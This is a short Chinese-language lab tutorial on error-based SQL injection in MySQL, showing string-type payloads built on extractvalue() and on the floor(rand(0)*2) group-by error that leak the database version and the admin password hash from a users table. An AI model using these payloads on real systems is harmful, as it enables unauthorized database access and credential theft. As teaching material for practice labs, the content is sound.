7.2.SQL注入-基于函数报错extractvalue(),floor()

注入基于函数报错extractvalue(),floor()-字符型

基于extractvalue()

爆出数据库版本payload语句：
kobe' and extractvalue(0,concat(0x7e,version()))#

爆出数据库版本

基于floor()

floor()函数就是取整数

爆出数据版本信息

kobe' and (select 2 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)#

如图所示：

将上面的payload语句中的version()换一个获取对应密码的payload语句

kobe' and (select 2 from (select count(*),concat((select password from users where username='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

如果所示，md5值加密的密码信息